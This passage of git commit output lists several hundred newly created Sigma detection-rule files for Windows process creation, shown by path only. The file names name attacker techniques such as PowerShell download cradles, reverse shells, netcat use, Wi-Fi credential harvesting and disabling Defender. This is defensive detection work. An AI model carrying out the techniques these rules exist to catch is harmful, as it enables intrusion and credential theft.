tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_sigverif.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_ssh.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_atbroker.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_dxcap.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_grpconv.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_tracker.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_ttdinject.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_type.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_unregmp2.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_utilityfunctions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_wfc.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_wlrmdr.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_workflow_compiler.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolscript_register_app.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lsass_process_clone.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_malware_conti_shadowcopy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_malware_script_dropper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mftrace_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mmc_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mofcomp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msbuild_susp_parent_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msdt_susp_cab_options.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msdt_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msedge_proxy_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_http.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_inline_vbscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_javascript.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_lethalhta_technique.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_susp_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_embedding.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_execute_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_install_quiet.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_install_remote.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_masquerading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_web_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msohtmed_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mspub_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mssql_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mstsc_remote_connection.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msxsl_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msxsl_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_default_accounts_manipulation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_network_connections_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_share_and_sessions_enum.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_share_unmount.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_start_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_stop_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_use_mount_admin_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_use_mount_internet_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_use_mount_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_use_password_plaintext.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_user_add.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_user_add_never_expire.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_add_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_delete_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_disable.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_set_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_packet_capture.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_port_forwarding.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_nltest_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_nltest_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_node_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_nslookup_domain_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_nslookup_poweshell_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ntdsutil_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ntdsutil_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_driver_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_response_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_response_file_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_arbitrary_cli_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_winword_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_perl_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_php_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ping_hex_ip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pktmon_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_plink_susp_tunneling.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powercfg_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_add_windows_capability.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_audio_capture.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_frombase64string.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_iex.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_invoke.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_mppreference.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cl_invocation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cl_loadassembly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_create_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_decode_gzip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_decrypt_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_defender_disable_feature.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_defender_exclusion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_disable_firewall.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_disable_ie_features.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_downgrade_attack.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_download_com_cradles.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_download_cradles.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_download_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_download_iex.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_download_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_email_exfil.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_encode.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_encoded_obfusc.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_encoding_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_exec_data_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_export_certificate.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_frombase64string.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_frombase64string_archive.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_get_clipboard.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_getprocess_lsass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_iex_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_invocation_specific.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_mailboxexport_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_non_interactive_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_public_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_run_script_from_ads.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_sam_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_script_engine_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_set_acl.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_set_service_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_snapins_hafnium.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_stop_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_download_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_parent_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_token_obfuscation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_webclient_casing.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_x509enrollment.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_xor_commandline.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_zip_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_presentationhost_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_print_remote_file_copy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_protocolhandler_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_provlaunch_potential_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_provlaunch_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_psr_capture_screenshots.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_3proxy_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_adfind_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_adfind_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_advanced_port_scanner.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_chisel.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_cleanwipe.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_crassus.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_csexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_defendercheck.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_ditsnap.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_frp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_iox.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_netcat.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_ngrok.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nimgrab.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nircmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nircmd_as_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nmap_zenmap.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nps.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nsudo.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_pingcastle.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_process_hacker.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_rcedit_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_rclone_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_runxcmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_seatbelt.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_system_informer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_webbrowserpassview.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_python_adidnsdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_python_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_python_pty_spawn.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_query_session_exfil.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rar_compress_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rar_compression_with_password.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rar_susp_greedy_compression.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rasdial_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_add_run_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_add_safeboot.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_bitlocker.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_defender_exclusion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_delete_safeboot.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_delete_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_desktop_background_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_disable_sec_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_machineguid.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_nolmhash.yml create mode 100644 